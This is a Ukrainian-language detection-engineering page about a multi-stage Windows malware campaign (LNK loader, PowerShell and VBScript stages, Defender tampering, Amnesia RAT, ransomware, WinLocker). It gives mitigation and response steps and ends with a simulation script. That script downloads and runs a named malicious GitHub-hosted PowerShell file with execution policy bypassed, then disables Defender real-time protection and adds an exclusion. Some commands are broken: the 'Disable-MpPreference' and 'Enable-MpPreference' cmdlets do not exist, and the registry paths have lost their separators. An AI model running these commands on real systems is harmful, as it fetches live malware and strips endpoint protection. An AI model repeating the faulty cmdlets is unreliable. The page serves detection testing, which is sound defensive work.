Всередині багатоступеневої операції з Windows-шкідливим програмним забезпеченням
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
FortiGuard Labs виявили багатоступеневий ланцюг вторгнення в Windows, який починається з шкідливого файлу LNK, що доставляється в стиснутому архіві. Ярлик запускає початкову PowerShell завантажувач, який витягує наступні скрипти з GitHub, а потім передає управління обфускованому оркестратору VBScript. Процес намагається ослабити захист кінцевої точки, вимикаючи Microsoft Defender, розгортаючи утиліту Defendnot і інсценуючи як Amnesia RAT, так і програму-здирник Hakuna Matata. Операція завершується скиданням компонента WinLocker, який блокує робочий стіл, щоб перешкодити відновленню та чинити тиск на жертв.
Розслідування
Слідчі відновили шлях виконання із PowerShell етапу, запущеного з LNK, до VBScript, який відновлює корисні навантаження в пам’яті, призводячи до розгортання програмного забезпечення-здирника і поведінки блокування робочого столу. Захисні заходи були обійдені через цільові редагування реєстру та ін’єкцією Defendnot DLL в Taskmgr.exe. Постійність була реалізована за допомогою комбінації записів Run key і артефактів папки Автозавантаження для повторного запуску ланцюга після входу.
Пом’якшення
Моніторте підозрілі зміни реєстру на рівні політики в розділах HKLMSOFTWAREPoliciesMicrosoftWindows Defender та HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Заблокуйте вихід до відомих шкідливих URL GitHub та Dropbox, що використовуються для інсценування, та попереджуйте про шаблони завантаження та виконання PowerShell, що походять з запусків LNK. Забезпечте білий список додатків і посиліть контроль виконання PowerShell для зменшення початкового доступу на основі скриптів.
Реакція
Якщо виявлено, ізолюйте кінцеву точку, відновіть налаштування реєстру, що стосуються Defender, до відомого доброго стану, і видаліть шкідливі файли і записи постійності. Проводьте пошук активних процесів Amnesia RAT і пов’язаної мережевої активності, і валідуйте, чи відбулося виконання програмного забезпечення-здирника. Проведіть повну судово-медичну експертизу, щоб оцінити вплив і усунути залишки, потім відновіть системи з чистих резервних копій, де це можливо.
Потік атаки
Виявлення
Підозрілий процес використовує URL в командному рядку (через cmdline)
Перегляд
Вимкнути моніторинг реального часу Windows Defender та інші зміни параметрів (через cmdline)
Перегляд
IOCs (HashSha256) для виявлення: Всередині багатоступенева кампанія зловмисного ПО для Windows
Перегляд
Шкідлива мережна активність та C2 через GitHub, Dropbox, Telegram [З’єднання мережі Windows]
Перегляд
Кампанія зловмисного ПО для Windows Виконання PowerShell [Windows Powershell]
Перегляд
Виконання PowerShell і CMD з відволіканням Install.exe [Створення процесу Windows]
Перегляд
Виконання симуляції
Передумови: Перевірка телеметрії та базова попередня перевірка має бути пройдена.
Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив повинні безпосередньо відображати визначені TTPs та націлені на генерацію тієї самої телеметрії, яку очікує логіка виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Атака & Команди:
Противник, який отримав початкове закріплення на кінцевій точці, бажає завантажити та виконати шкідливий PowerShell корисний навантажувач, уникаючи політики виконання за замовчуванням. Вони використовуютьInvoke‑Expression(iex) у поєднанні зInvoke‑WebRequest(irm) для витягування скрипту з віддаленого GitHub raw URL, запускаючи його під-ExecutionPolicy Bypass. Після встановлення постійності вони відключають моніторинг реального часу Windows Defender, щоб уникнути виявлення наступних корисних навантажень. Ці кроки безпосередньо генерують командні рядки, за якими спостерігає правило Sigma. -
Сценарій регресійного тестування:
# -------------------------------------------------------------- # Крок 1 – Виконати віддалений скрипт з ExecutionPolicy Bypass # -------------------------------------------------------------- $maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1" powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex" # -------------------------------------------------------------- # Крок 2 – Вимкнути моніторинг реального часу Windows Defender # -------------------------------------------------------------- # Вимкнути захист у реальному часі Disable-MpPreference -DisableRealtimeMonitoring $true # Додати шлях для виключення (симульовано) Add-MpPreference -ExclusionPath "C:TempExcludeFolder" -
Команди очищення:
# Повторно увімкнути моніторинг реального часу Windows Defender Enable-MpPreference -DisableRealtimeMonitoring $false # Видалити шлях для виключення (якщо існує) Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue # Зупинити будь-які залишкові PowerShell процеси, запущені скриптом Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force